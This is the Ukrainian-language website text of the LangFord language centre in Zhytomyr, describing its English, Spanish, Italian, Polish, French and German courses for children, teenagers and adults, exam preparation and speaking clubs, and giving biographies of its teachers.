Ліцензія №133324 Серія АА від 29.05.2015 р.

м. Житомир, вул.Перемоги 7А +38 (063) 436-03-26;  +38 (066) 918-93-05
м. Житомир, вул.С.Ріхтера 6А, оф. 5А +38 (063) 700-30-13;  +38 (068) 170-11-94

Курс англійської мови для молодших школярів (6-10 років)


Хоча підходи до вивчення іноземних мов постійно змінюються, досить часто буває так, що дитина, через певні психофізіологічні особливості розвитку, не може засвоїти базові аспекти іноземної мови. І в подальшому це призводить до того, що в старшому шкільному віці учню важко дається вивчення англійської.Звичайно в школі немає можливості індивідуально підійти до кожної дитини. Саме тому ми й запровадили курс вивчення англійської мови для молодших школярів. У нас діти від 6 до 10 років вивчають англійську мову в цікавій ігровій формі по оригінальних підручниках британських видавництв. Пропонується зручний формат навчання: онлайн або офлайн

Курс англійської мови для молодших школярів в Центрі “LangFord” допоможе вашій дитині повторити вивчений в школі матеріал, закріпити знання й піти далеко вперед. Групи формуються не тільки по віку, а й по рівню знань мови. Діти старші 6 років перед зарахуванням на курс англійської для дітей в Центрі “LangFord” проходять співбесіду, щоб визначити можливості та успіхи школяра. Наші переваги – в індивідуальному підході до кожної дитини, адже групи формуються невеликі, щоб у викладача було достатньо часу попрацювати з кожною дитиною під час заняття.

Закінчивши курс англійської мови для молодших школярів діти навчаться читати та писати англійською, поповнять словниковий запас слів та виразів, а також засвоять основні правила граматики, необхідні для побудови нескладних виразів.Дуже швидко Ви побачите, наскілки легше дитині вивчати англійську в школі!

Англійська для дорослих!


0108.2023

Готуються до старту групи різних рівнів по вивченню англійської мови для дорослих ! Зручний формат навчання: онлайн або офлайн.

Якщо Ви мрієте вивчати англійську, але не хотіли б опинитися в групі серед школярів, щоб не відчувати дискомфорт,  наші групи саме для ВАС!!! Адже ми збираємо групи дійсно для дорослих )))

80% кожного заняття складатиме мовна практика.

Цікавлять деталі? Телефонуйте нам, і ми з радістю відповімо на всі Ваші питання:

066 918-93-05      068 170-11-94      063 700-30-13

Запишіть дитину на навчання!!!


0108.2023

Запишіть дитину на курс англійської в Центрі «LangFord» і забудьте про довгі години мук над домашніми завданнями з англійської в школі. Ви побачите, що навчання може бути не тільки корисним, а й цікавим! Обіцяємо, Вам не доведеться примушувати дитину займатися, вона робитиме це з задоволенням!

В Центрі вивчення іноземних мов «LangFord» групи формуються за віком та рівнем володіння  мовою, що визначається на безкоштовному тестуванні.

Заняття проходять двічі на тиждень, в зручному для Вас форматі: онлайн або оффлайн. Є ранкові та денні групи.

Щоб записатися на безкоштовне тестування, телефонуйте нам:

066 918 93 05

068 170 11 94

063 700 30 13

Набір в групи по вивченню німецької мови!


0108.2023

Запрошуємо всіх бажаючих до вивчення німецької!

Continue reading Набір в групи по вивченню німецької мови!

Курс англійської для молодших підлітків (11-13 років)


Курс англійської мови для молодших підлітків

Молодший підлітковий вік – початок складного періоду в житті кожної людини. Все частіше діти намагаються ухилитися від навчання чи виконання домашньої роботи. Але саме у цей період щира зацікавленість школяра у предметі дозволить і у подальшому втримати його увагу та інтерес.

Курс англійської мови для молодших підлітків створений з метою підтримати інтерес до вивчення мови, «підтягнути» граматику, яку, можливо впустили, розвинути здатність сприймати мову на слух, відкоригувати вимову, позбавити страху спілкування, якщо такий є , тощо.

На курс вивчення англійської мови для молодших підлітків запрошуються діти віком від 11 до 13 років. Курс складається з 3 рівнів. Навчання проводиться у групах по рівню знань, який визначається по результатах співбесіди. Пропонується зручний формат навчання: онлайн або офлайн.

Курси іноземних мов  в центрі LangFord це чудова нагода підвищити рівень знань іноземної мови та зацікавити дитину, розширити її можливості, підняти самооцінку. Педагоги, які викладають англійськув Центрі, мають багаторічний викладацький досвід та досвід роботи з дітьми різного віку. Наші викладачі знаходять спільну мову зі школярами та надихають їх на покращення своїх знань з іноземних мов.

Курс англійської мови для молодших підлітків в центрі  LangFord допоможе дітям подолати труднощі в засвоєнні основних граматичних структур, значно розширити свій словниковий запас, відшліфувати вимову та розвинути навички  спілкування англійською.

 

Курс англійської мови для старших підлітків (14-17 років)


Курс англійської мови для підлітків

Вік 14-17 років можна порівняти з трампліном у доросле життя. Діти готуються до вступу у ВНЗ, як вітчизняні, так і закордонні. Тому, ґрунтовні знання, без перебільшення міжнародної, англійської мови конче необхідні.

Курс англійської мови  для старших підлітків  в центрі LangFord  зорієнтований на мовні рівні, що є стандартами класифікації мовних знань людини та розроблені згідно загальноєвропейських рекомендацій. Пропонуємо Вашій увазі 4х-рівневий курс англійської мови – кожен рівень відповідає вищій мовленнєвій компетенції і ускладнюється після засвоєння попереднього. Зарахування в групи курсів англійської мови для старших підлітків відбувається по результатах співбесіди, в залежності від того, з яким рівнем дитина прийшла до нас.

Дидактичний матеріал, який ми використовуємо для навчання підлітків захоплює, обігрує максимально наближені до життєвих умов ситуації, усуває страх спілкування, сприяє особистісному зростанню підлітка, та просто мотивує дитину до досконалого вивчення англійської мови.

Пройшовши повний курс вивчення англійської мови для старших підлітків в LangFord, Ваша дитина буде вільно володіти мовою. Інакше кажучи – матиме знання, які відповідають рівню В2 (незалежний користувач) загальноприйнятої європейської системи (The Common European Framework of Reference). Про що буде свідчити наше свідоцтво, яке видається по закінченню повного курсу по результатах складання іспитів.

Курс підготовки до ЗНО з англійської мови або міжнародних тестів


Окремим курсом ми винесли підготовку до ЗНО  з англійської мови або міжнародних тестів, адже підготуватися до них справа складна навіть для тих школярів, які на високому рівні володіють мовою. Сам факт складання таких тестів бентежить як дітей, так і їх батьків.

Насправді, підготовка до ЗНО з англійської мови або до складання міжнародних тестів має в першу чергу психологічний фактор. Чим впевненіше дитина почувається у своїх знаннях, тим менший стрес вона отримує на тестуванні і тим більше концентрується на завданнях і власних знаннях.

Ми запрошуємо учнів 11 класів на підготовчий курс до складання тестів в центр LangFord. Це спеціалізований курс для старшокласників, що дає можливість засвоїти структуру самого тесту, «підтягнути» знання з мови, додати впевненості у власних силах та в результаті отримати високі бали.

Протягом курсу слухачі повністю проходять граматичний матеріал, «добирають» лексику, проходять всі можливі типи завдань, які зустрічаються в тестах, в тому числі і письмові.

Періодично слухачі курсу проходять подібні пробні тести. Наші викладачі діляться своїм досвідом, секретами та фішками, які неодмінно стануть у нагоді при написанні тестів.

Все це у комплексі дозволить успішно пройти випробування і отримати максимальну кількість балів. Використайте шанс покращити майбутнє своєї дитини!

Розмовний клуб англійської мови для дітей


Запрошуємо дітей на засідання англійського мовного клубу, де вони матимуть можливість поспілкуватись англійською мовою на цікаві теми в групі своєї вікової категорії та свого рівня володіння англійською мовою.

Для того, щоб отримувати інформацію про засідання клубу, надішліть заявку на нашу електронну адресу: langford@ukr.net.

Курс англійської мови для дорослих


Курс англійської мови для дорослих LangFord

Не секрет, що дорослим важче дається вивчення іноземної мови в силу певних обставин. І часу обмаль, і доросле життя не дуже цьому сприяє…

Але! У житті немає нічого неможливого! Курси англійської мови для дорослих в LangFord створені для того, щоб ви продовжували розвиватися і сягати нових життєвих вершин.

Закінчивши курси з англійської мови для дорослих ви впевнено будете почуватися при спілкуванні з іноземцями, зможете читати, дивитися програми та фільми мовою оригіналу, подорожувати і заводити нових друзів по всьому світу. А можливо, курс англійської мови для дорослих стане новим етапом у вашому професійному або особистому житті?

Курс вивчення англійської для дорослих розрахований на вивчення мови «з нуля» або покращення та розвиток знань, які Ви вже маєте!

Курс складається з 5 рівнів, які тривають по 5 місяців. Навчання англійської мови для дорослих на кожному рівні закінчується підсумковими тестами (усним та письмовим), по результатах яких Ви матимете можливість отримати сертифікат, що підтверджує Ваші знання мови. Навчання проводиться у зручному для Вас форматі: онлайн або офлайн.

Заняття на курсах мають суто практичний характер та спрямовані на досягнення головної мети – навчити Вас спілкуватися англійською. А почнете Ви говорити англійською вже на першому занятті, навіть, якщо раніше ніколи не вивчали цю мову!

Якщо ж Ви вже маєте певні знання англійської, варто пройти безкоштовне тестування для визначення Вашого рівня, щоб підібрати групу, яка Вам підходить найбільше! Адже у нас працюють групи 5 рівнів: Для новачків, Початковий, Пред-середній, Середній, Вище-середнього.

Вивчати англійську мову для дорослих краще з професіоналами!

Індивідуальна підготовка до міжнародних іспитів


Підготовка до міжнародних іспитів з англійської мови

Якщо Ви маєте на меті навчання, роботу чи тривале перебування за кордоном або бажаєте суттєво підвищити свій рейтинг на закордонному чи місцевому ринку праці, Вам потрібно буде здавати міжнародні екзамени з англійської мови на підтвердження свого рівня володіння  мовою.  Кожен з таких тестів має специфічну структуру, і навіть якщо Ви непогано знаєте мову, на Вас чекає досить складний процес підготовки, який важко подолати самостійно.

Ми готові допомогти Вам підготуватися до:

  • міжнародних іспитів Key English Test (KET)– це початковий тест, який перевіряє здатність орієнтуватися та спілкуватися на побутові теми на елементарному рівні. З 2009 року існує різновид тесту КЕТ – КЕТ для школярів 11-14 років.
  • міжнародних іспитів Preliminary English Test (PET)– це тест, який перевіряє рівень знання усної та письмової англійської на середньому рівні. З 2009 року існує різновид тесту РЕТ – РЕТ для школярів 11-14 років.
  •  міжнародних іспитів IELTS (International English Language Testing System) – тест орієнтований на перевірку рівня знань британської англійської. Існує два види цього іспиту: Academic Module (для вступників до університетів за кордоном) і General Module (для тих, хто виїжджає на ПМЖ у Канаду, Австралію або Нову Зеландію).
  • підготовка до міжнародних іспитів TOEFL (Test of English as a Foreign Language)– це тест, який перевіряє знання американської англійської. Його здають для вступу в американські чи канадські університети, а також для втупу на програми MBA за кордоном.
  • міжнародних іспитів FCE (First Certificate in English)– іспит на знання британського англійської для студентів середнього рівня за абсолютною шкалою рівнів англійської мови (від початківця до еквівалента носія мови).

Групи вихідного дня


Курс англійської мови в вихідні дні

Мрії вивчити англійську переслідують вас? Але напружене життя, робота і сім’я не лишають часу на втілення мрії в життя?

У нас є для вас ідеальна пропозиція! Курс англійської мови в вихідні дні в центрі LangFord дозволить Вам вивчати мову тоді, коли у вас є час. Виділити кілька годин у вихідний день для здійснення мрії цілком реально! Групи вихідного дня в центрі LangFord- чудовий вихід для тих, хто має високий темп життя, зайнятий роботою, навчанням чи домашніми справами і не має можливості відвідувати курси у будні дні. Тож, англійська мова по вихідним дням займе у Вас всього лише кілька годин, а знання мови  залишиться назавжди!

Групи вихідного дня в центрі LangFord працюють за наступною схемою: викладач презентує новий граматичний та лексичний матеріал, Ви спілкуєтесь англійською з одногрупниками, а в кінці заняття отримуєте пакет завдань з ключами-відповідями на тиждень для самостійного закріплення пройденого матеріалу. На наступних вихідних ви закріплюєте пройдений матеріал і отримуєте нові знання і завдання. Все дуже просто!

Ціна на Англійську по вихідним дням в центрі LangFord доступна кожному!

Розмовний клуб


Розмовний клуб англійської мови в центрі LangFord

Ну де ще можна повправлятися у розмовній англійській? У нас в клубі! Де знайти друзів і нових знайомих «по інтересах»? У нас в клубі! Де обмінятися думками іноземною мовою? У нас в клубі!

У нашому  розмовному клубі англійської мови!

Ви вже пройшли довгий шлях – доклали багато зусиль, щоб вивчити англійську мову, але наразі у Вас немає можливості її активно використовувати, і поступово вона починає забуватися?

Ви, незважаючи на давно не підлітковий вік, соромитеся своєї вимови?

Терміново долучайтеся до нашого англійського розмовного клубу, де Ви зможете не тільки попрактикувати спілкування англійською, обговорити цікаві та актуальні для Вас теми, але й знайти нових друзів та цікавих співрозмовників.

Англійський розмовний клуб в центрі LangFord дозволить вам вивчити нові слова, «відшліфувати» граматику та вимову. Адже викладач завжди поруч!

Для отримання інформації про англійський розмовний клуб в центрі LangFord з приводу ціни та розкладу засідань надсилайте заявку на нашу електронну адресу: langford@ukr.net

Розмовляйте, практикуйте та звільніться від бар’єрів у спілкуванні разом з нами!

Гнучкий графік (не опублікована)


Як правило заняття в центрі LangFord проходять у фіксований час. Тому тим, хто працює по змінах, доводиться або навчатися самостійно, або наймати репетитора.

Наша пропозиція – комбіноване навчання. Ви навчаєтесь в групі, коли Вам дозволяє Ваш робочий графік, а пропущені заняття відпрацьовуєте з викладачем

Корпоративне вивчення англійської мови


Ніхто і не сперечатиметься з твердженням, що англійська мова – лідер серед мов спілкування у діловому світі. Хто б не був вашим стратегічним партнером чи клієнтом за кордоном, ви все одно будете вести ділову переписку чи розмови англійською. 80 % контенту Інтернет-простору англомовне, те ж стосується і спеціалізованої літератури.

Тому, часто до вимог кваліфікованого робітника додається обов’язкове знання англійської. Але якщо ваші співробітники кваліфіковані і не один рік віддали компанії, та не володіють мовою?

Сучасні вимоги підвищуються не лише до працівників, але й компаній. І корпоративне вивчення англійської мови у таких випадках буде дуже доречним. Корпоративне навчання англійської зміцнить корпоративний дух у колективі, підніме довіру до керівництва та підвищить продуктивність роботи.

Володіння англійською Вашими співробітниками може стати початком успішного просування Вашої компанії на міжнародному рівні.

На корпоративне вивчення англійської мови ціна доступна для будь-якої компанії малого, середнього чи великого бізнесу і розраховується окремо для кожної компанії.

 

Курс іспанської мови для дітей 6-10 років


Запрошуємо дітей 6-10 років на багаторівневий курс іспанської  мови. Заняття проходять в цікавій ігровій формі по оригінальним підручникам іспанських видавництв. З перших занять особлива увага приділяється спілкуванню іспанською.

Дітки, які вже вивчали іспанську зараховуються до груп по результатах співбесіди.

Наразі заняття проходять тільки в онлайн форматі.

Курс іспанської мови для молодших підлітків (11-13 років)


Запрошуємо дітей віком 11-13 років на 3-рівневий курс іспанської мови. Зарахування в групи відбувається по результатах співбесіди.

Наразі заняття проходять тільки в онлайн форматі.

Курс іспанської мови для старших підлітків (14-17 років)


Запрошуємо підлітків віком 14-17 років пройти 4-рівневий курс іспанської мови. Зарахування в групи відбувається по результатах співбесіди, в залежності від того з яким рівнем дитина прийшла до нас.

Наразі заняття проходять тільки в онлайн форматі.

Курс іспанської мови для дорослих


Вас приваблює іспанська? Хочеться читати іспанською, дивитися іспанські програми та фільми, почуватися впевнено під час подорожей, заводити нових друзів …??? Тоді, цей курс саме для Вас!!!

В рамках цього курсу Ви зможете вивчити іспанську, як то кажуть, “з нуля” чи покращити та розвинути знання мови, які Ви вже маєте! Курс складається з 4 рівнів, які тривають по 5 місяці. Навчання на кожному рівні закінчується підсумковими тестами (усним та письмовим), по результатах яких Ви матимете можливість отримати сертифікат, що підтверджує Ваші знання мови.

Заняття на курсах мають суто практичний характер та спрямовані на досягнення головної мети – навчити Вас спілкуватися іспанською! А почнете Ви говорити іспанською вже на першому занятті, навіть якщо раніше ніколи не вивчали цю мову!

Якщо ж Ви вже маєте певні знання іспанської, варто пройти безкоштовне тестування для визначення Вашого рівня, щоб підібрати групу, яка Вам підходить найбільше! Адже у нас працюють групи 4 рівнів: Початковий, Пред-середній, Середній, Вище-середнього.

Наразі заняття проходять тільки в онлайн форматі.

Розмовний курс з італійської мови


Даний курс підійде Вам, якщо Ви бажаєте вивчати італійську “для себе”. Тобто Ви не плануєте складати іспити чи проходити якісь серйозні тестування, не маєте наміру шукати роботу, де знання італійської мови має бути на дуже високому рівні. Вам хочеться читати літературу, дивитися італійські програми та фільми, почуватися впевнено під час подорожей до Італії, заводити нових друзів … Тобто головна Ваша мета – навчитися спілкуватися італійською!

Заняття в рамках цього курсу  в центрі LangFord мають суто практичний характер. Ви вивчатимете слова та структури, які знадобляться Вам для спілкування в основних побутових ситуаціях.

Курс польської мови для дітей 6-10 років


Курс польської мови для молодших школярів в центрі LangFord

Центр вивчення іноземних мов LangFord запрошує дітей 6-10 років на багаторівневі курси польської мови  для молодших школярів . Заняття ведуть висококваліфіковані педагоги з досвідом викладання польської мови. Курси польської мови для молодших школярів проходять в цікавій ігровій формі по оригінальним підручникам польських видавництв.

З перших занять в центрі LangFord особлива увага приділяється спілкуванню польською. Дітки, які вже вивчали польську, зараховуються в групи по результатах співбесіди.

На початковому рівні вивчення польської мови в центрі LangFord діти навчаються читати та писати польською мовою, вивчають багато нових слів та виразів, а також засвоюють основні правила граматики, необхідні для побудови нескладних висловлювань. На подальших рівнях буде постійно збільшуватися їх словниковий запас, діти засвоять граматичні структури потрібні для спілкування та розвиватимуть навички говоріння польською.

Курс польської мови для молодших підлітків (11-13 років)


Курс польської мови для молодших підлітків в центрі LangFord

Запрошуємо дітей віком 11-13 років на 3-рівневі курси вивчення польської мови для молодших підлітків в центрі LangFord. На заняттях особлива увага приділяється спілкуванню – щоб дитина вільно могла розповісти про себе, спілкуватися на елементарні теми, розуміти мову на побутовому рівні. Курси польської мови для молодших підлітків в центрі LangFord повністю готують підлітків до елементарного рівня знання мови по завершенню курсів.

Зарахування в групи  польської для молодших підлітків в центрі LangFord відбувається по результатах співбесіди.

Курси польської мови  для молодших підлітків в центрі LangFord допоможуть  дітям подолати труднощі в засвоєнні основних граматичних структур, вони значно розширять свій словниковий запас, відшліфують вимову та розвинуть навички говоріння польською.

Курс польської мови для старших підлітків (14-17 років)


Курси польської мови для старших підлітків в центрі LangFord

Запрошуємо на 4-рівневі курси вивчення польської мови для старших підлітків віком 14-17 років. Зарахування в групи  польської мови для старших підлітків відбувається по результатах співбесіди, залежно від того, з яким рівнем дитина прийшла до нас.

Пройшовши повні курси польської мови  для старших підлітків в центрі LangFord Ваша дитина буде вільно володіти мовою. Школяр матиме такі знання, що відповідають рівню В2 (незалежний користувач) загальноприйнятої європейської системи (The Common European Framework of Reference). Про що буде свідчити наше свідоцтво, яке видається по закінченню повного курса по результатах складання іспитів.

Курс польської мови для дорослих


Маєте польське коріння, але не було можливості вивчити польську мову? Плануєте навчатися чи працювати в Польщі? Маєте партнерів по бізнесу в Польщі? Або просто хочеться читати польською, дивитися польські програми та фільми? Тоді, цей курс саме для Вас!!!

В рамках курсу Ви зможете вивчити польську, як то кажуть, “з нуля” чи покращити та розвинути знання мови, які Ви вже маєте! Курс складається з 4 рівнів, які тривають по 5 місяців. Навчання на кожному рівні закінчується підсумковими тестами (усним та письмовим), по результатах яких Ви матимете можливість отримати сертифікат, що підтверджує Ваші знання мови.

Заняття в центрі LangFord мають суто практичний характер та спрямовані на досягнення головної мети – навчити Вас спілкуватися польською! А почнете Ви говорити польською вже на першому занятті, навіть якщо раніше ніколи не вивчали цю мову!

Якщо ж Ви вже маєте певні знання польської, варто пройти безкоштовне тестування для визначення Вашого рівня, щоб підібрати групу, яка Вам підходить найбільше! Адже у нас працюють групи 4 рівнів: Початковий, Пред-середній, Середній, Вище-середнього.

Індив.зан. для дор. з польської (не опубліковано)


Маєте польське коріння, але не було можливості вивчити польську мову? Плануєте навчатися чи працювати в Польщі? Маєте партнерів по бізнесу в Польщі? Або просто хочеться читати польською, дивитися польські програми та фільми? Тоді, курс польської мови для дорослих в центрі LangFord саме для Вас!

Курси  польської мови для дорослих дозволять вивчити польську, як то кажуть, “з нуля” чи покращити та розвинути знання мови, які Ви вже маєте! Курс вивчення польської для дорослих складається з 4 рівнів, які тривають по 5 місяці. Навчання на кожному рівні закінчується підсумковими тестами (усним та письмовим), по результатах яких Ви матимете можливість отримати сертифікат, що підтверджує Ваші знання мови.

Навчання польської мови для дорослих мають суто практичний характер та спрямовані на досягнення головної мети – навчити Вас спілкуватися польською! А почнете Ви говорити польською вже на першому занятті, навіть якщо раніше ніколи не вивчали цю мову! Якщо ж Ви вже маєте певні знання польської, варто пройти безкоштовне тестування для визначення Вашого рівня, щоб підібрати групу, яка Вам підходить найбільше!

Вивчати польську мову для дорослих простіше і швидше з нами!

Курс польської мови для дорослих складається з груп 4 рівнів: Початковий, Пред-середній, Середній, Вище-середнього.

  • Початковий рівень дасть Вам можливість сприймати на слух нескладну інформацію на польській мові подану в уповільненому темпі. Ви зможете спілкуватись на певні побутові теми (наприклад, розказати про свої вподобання, про свою роботу, запитати дорогу, замовити їжу в ресторані і т.п.) і читати невеличкі та нескладні тексти та адаптовані розповіді . Цього рівня Вам вистачить, щоб не загубитися під час закордонної подорожі. За європейською класифікацією це рівень А1.
  • Пред-середній рівень передбачає більш широкий словниковий запас і вміння вести бесіду, знання основних граматичних структур, можливість написання особистих чи ділових листів. Ви не тільки не загубитесь за кордоном, але й зможете скористатися усіма пропозиціями зробленими Вам польською! За європейською класифікацією це рівень А2.
  • Середній  рівень дозволяє вільно спілкуватися польською на різні теми та розуміти співрозмовників, читати книжки та дивитися фільми (не наукові звичайно) на польській мові, вести особисте та ділове листування. За європейською класифікацією це рівень В1.
  • Рівень Вище середнього: Після цього рівня можна вільно спілкуватися з носіями мови, дискутувати, читати неадаптовану літературу, переглядати фільми та улюблені серіали. За європейською класифікацією це рівень В2.

Курс французької мови для дітей 6-10 років


Курс французької мови для молодших школярів  діє в центрі LangFord вже тривалий час і користується популярністю. Діти віком 6-10 років запрошуються на багаторівневий курс вивчення французької мови для молодших школярів. Заняття проходять в цікавій ігровій формі по оригінальним підручникам французьких видавництв. З перших занять особлива увага приділяється спілкуванню французькою. Дітки, які вже вивчали французьку мову зараховуються в групи по результатах співбесіди.

Курс французької мови для молодших школярів в центрі LangFord дає хороші результати по закінченню  кожного з рівнів.

На початковому діти навчаються читати та писати французькою, вивчають багато нових слів та виразів, а також засвоять основні правила граматики, необхідні для побудови нескладних висловлювань. На послідуючих рівнях буде постійно збільшуватися їх словниковий запас, діти засвоять граматичні структури потрібні для спілкування та розвиватимуть навички говоріння французькою.

Курс французької для молодших школярів в центрі LangFord- чудова нагода для спілкування, вивчення мови та часу, проведеного з користю.

Курс французької мови для молодших підлітків (11-13 років)


Запрошуємо дітей віком 11-13 років на 3-рівневий курс французької мови для молодших підлітків в центрі LangFord. Курс триває 4, 5 місяці протягом 2х занять на тиждень. Курс вивчення французької мови для молодших підлітків проходить у  невимушеній, живій та цікавій атмосфері.

Зважаючи на рівень володіння мовою, підлітки проходять співбесіду та розподіляються по групах. Курс французької мови для молодших підлітків ведуть  досвідчені викладачі і використовують для навчання оригінальні підручники та інші допоміжні матеріали, які роблять уроки цікавими і насиченими.

Курс французької мови для молодших підлітків в центрі LangFord допоможе дітям подолати труднощі в засвоєнні основних граматичних структур, вони значно розширять свій словниковий запас, відшліфують вимову та розвинуть навички говоріння французькою мовою.

Курс французької мови для старших підлітків (14-17 років)


Запрошуємо дітей віком 14-17 років пройти 4-рівневий курс вивчення французької мови для старших підлітків.  Зарахування в групи  французької мови для старших підлітківв центрі LangFord відбувається по результатах співбесіди, в залежності від рівня знань  з яким рівнем дитина прийшла до нас.

Пройшовши повні курси французької мови  для старших підлітків в центрі LangFord, Ваша дитина буде вільно володіти мовою, тобто матиме такі знання, що відповідають рівню В2 (незалежний користувач) загальноприйнятої європейської системи (The Common European Framework of Reference). Про що буде свідчити наше свідоцтво, яке видається по закінченню повного курса по результатах складання іспитів.

Курс французької мови для дорослих


Вас приваблює французька? Хочете читати французькою, дивитися французькі програми та фільми, почуватися впевнено під час подорожей до Франції, заводити нових друзів …??? Тоді, цей курс саме для Вас!!!

В рамках курса Ви зможете вивчити французьку, як то кажуть, “з нуля” чи покращити та розвинути знання мови, які Ви вже маєте! Курс складається з 4 рівнів, які тривають по 5 місяці. Навчання на кожному рівні закінчується підсумковими тестами (усним та письмовим), по результатах яких Ви матимете можливість отримати сертифікат, що підтверджує Ваші знання мови.

Заняття на курсах мають суто практичний характер та спрямовані на досягнення головної мети – навчити Вас спілкуватися французькою! А почнете Ви говорити французькою вже на першому занятті, навіть якщо раніше ніколи не вивчали цю мову!

Якщо ж Ви вже маєте певні знання французької, варто пройти безкоштовне тестування для визначення Вашого рівня, щоб підібрати групу, яка Вам підходить найбільше! Адже у нас працюють групи 4 рівнів: Початковий, Пред-середній, Середній, Вище-середнього.

Курс німецької мови для дітей 6-10 років


Дітям зазвичай легко даються іноземні мови, особливо якщо вони їх чують у найближчому оточенні.

Але що робити, якщо у вашої дитини з вивченням німецької складнощі, а ви їй не можете допомогти?

Для цього у нас діють курси німецької мови для дітей, щоб допомогти їм у вивченні, покращенні знань з іноземної мови.

Курси німецької для дітей в центрі LangFord розраховані на дітей 6-10 років. Звертаємо вашу увагу, що ми пропонуємо багаторівневі курси вивчення німецької мови.

Заняття проходять в цікавій ігровій формі по оригінальним підручникам німецьких видавництв. З перших занять особлива увага приділяється спілкуванню німецькою. Дітки, які вже вивчали німецьку, зараховуються в групи по результатах співбесіди.

На початковому рівні курсів німецької мови  для дітей в центрі LangFord діти навчаться читати та писати німецькою, вивчать багато нових слів та виразів, а також засвоять основні правила граматики, необхідні для побудови нескладних висловлювань.

На послідуючих рівнях буде постійно збільшуватися їх словниковий запас, діти засвоять граматичні структури потрібні для спілкування та розвиватимуть навички говоріння німецькою.

Приєднуйтеся!

Курс німецької мови для молодших підлітків (11-13 років)


Курси вивчення німецької мови для молодших школярівце чудова нагода вивчити додаткову іноземну мову, розширити кругозір, знайти нових друзів та отримати шанс на розширення можливостей у майбутньому.

Запрошуємо дітей віком 11-13 років на 3-рівневі курси німецької мови для молодших школярів. Зарахування в групи відбувається по результатах співбесіди, щоб визначити рівень знань та підібрати оптимальну групу та скоригувати програму при потребі.

Курси німецької для молодших школярів в центрі LangFord допоможуть дітям подолати труднощі в засвоєнні основних граматичних структур, значно розширять наявний словниковий запас, відшліфують вимову та розвинуть навички спілкування  іноземною.

Запишіть свою дитину на курси німецької мови  для молодших школярів в центрі LangFord і дайте можливість виграти їй лотерейний квиток у житті.                     

Курс німецької мови для старших підлітків (14-17 років)


Запрошуємо дітей віком 14-17 років прийти на 4х-рівневі  курси вивчення німецької мови для старших підлітків. Це чудова нагода «підтягнути» німецьку, підвищити рівень знань з іноземної мови, знайти однодумців та нових друзів. Зарахування в групи на курси німецької мови для старших підлітків в центрі LangFord відбувається по результатах співбесіди, в залежності від того з яким рівнем дитина прийшла до нас.

Пройшовши повністю курси німецької мови  для старших підлітків в центрі LangFord Ваша дитина буде вільно володіти мовою, тобто матиме такі знання, що відповідають рівню В2 (незалежний користувач) загальноприйнятої європейської системи (The Common European Framework of Reference). Про що буде свідчити наше свідоцтво, яке видається по закінченню повного курсу по результатах складання іспитів.

Курс німецької мови для дорослих


Школа німецької мови для дорослих в центрі LangFord

Вас цікавить німецька? Хочете читати німецькою, дивитися німецькі програми та фільми, почуватися впевнено під час подорожей, заводити нових друзів? Тоді, курс німецької мови для дорослих саме для Вас! В рамках курсу навчання німецької мови для дорослих Ви зможете вивчити німецьку “з нуля” чи покращити та розвинути знання мови, які Ви вже маєте!

Курс вивчення німецької для дорослих складається з 4 рівнів, які тривають по 5 місяці. Навчання на кожному рівні закінчується підсумковими тестами (усним та письмовим), по результатах яких Ви матимете можливість отримати сертифікат, що підтверджує Ваші знання мови. Заняття на курси з німецької мови для дорослих мають суто практичний характер та спрямовані на досягнення головної мети – навчити Вас спілкуватися німецькою! А почнете Ви говорити німецькою вже на першому занятті, навіть якщо раніше ніколи не вивчали цю мову!

Давайте вивчати німецьку мову для дорослих разом з нами!

Перед тим, як розпочати курс німецької мови для дорослих в центрі LangFordрадимо пройти безкоштовне тестування для визначення Вашого рівня, щоб підібрати групу, яка Вам підходить найбільше! Адже у нас працюють групи 4 рівнів: Початковий, Пред-середній, Середній, Вище-середнього.

Чому варто навчатись у нас


Ларіна Наталія Володимирівна


Наталія Володимирівна – випускниця Житомирського державного педагогічного інституту імені Івана Франка, 1998 року за спеціальністю “Вчитель російської і англійської мови та зарубіжної літератури”. Має диплом номінанта конкурсу для вчителів англійської мови у початкових класах, що проводився представництвом міжнародної освітньої групи “Пірсон Ед’юкейшн” та газетою “English” в 2012/13 навчальному році, Сертифікат учасника міжнародної науково- практичної конференції Перспективи раннього навчання іноземним мовам в Україні та за кордоном, Безперервна педагогічна освіта вчителів, 2012 року, грамоту за 1 місце в конкурсі для вчителів Ukrainian Culture Time, проведеному міжнародним видавництвом MM Publications спільно з Міністерством освіти і науки України в 2016 році. У 2016 році Наталія Володимирівна отримала сертифікати про успішне складання 3 модулів Кембріджського екзамену ТКТ (The Teaching Knowledge Test).

В нашому Центрі Наталія Володимирівна працює з 2010 року, вона є методистом нашого Центру, авторкою багатьох програм та методичних розробок, які успішно використовуються в роботі груп всіх категорій та рівнів.

Викладає англійську в дитячих, підліткових та дорослих групах. А також російську та українську для іноземців.

Пархомець Марина Вікторівна


Марина Вікторівна – випускниця Житомирського державного педагогічного університету імені Івана Франка, факультету іноземних мов. У 2016 році Марина Вікторівна отримала сертифікати про успішне складання 3 модулів Кембріджського екзамену ТКТ (The Teaching Knowledge Test).

Працює в нашому Центрі з 2010 року. Спеціалізується на викладанні англійської мови в дорослих та підліткових групах (від Початкового до Продвинутого рівнів)

Дєньгаєва Світлана Вікторівна


Світлана Вікторівна – випускниця Житомирського державного університету імені Івана Франка, 2006 року. Спеціальність “Педагогіка і методика середньої освіти. Мова та література (англійська, німецька)”. Має диплом кандидата педагогічних наук. У 2016 році Світлана Вікторівна отримала сертифікати про успішне складання 3 модулів Кембріджського екзамену ТКТ (The Teaching Knowledge Test).

В Центрі Світлана Вікторівна працює 7 років. Спеціалізується на викладанні англійської мови в дитячих, підліткових та дорослих групах.

Мельніченко Тетяна Миколаївна


Тетяна Миколаївна – випускниця Житомирського державного університету імені Івана Франка, 2010 року. Спеціалізація “Викладач педагогіки і методики початкової освіти. Вчитель англійської мови початкової школи”

В Центрі Тетяна Миколаївна працює з 2012 року, викладає англійську мову в дитячих та підліткових групах. Є автором програм по навчанню англійській мові дітей дошкільного віку

Лутай Валерія Ігорівна


Валерія Ігорівна – випускниця Житомирського державного університету імені Івана Франка 2009 року за спеціальністю “Вчитель англійської і німецької мов та зарубіжної літератури. Працює в нашому Центрі з 2009 року. Спеціалізується на викладанні англійської мови в підліткових та дорослих горупах (від Початкового до Продвинутого рівнів)

Щирук Олександр Михайлович


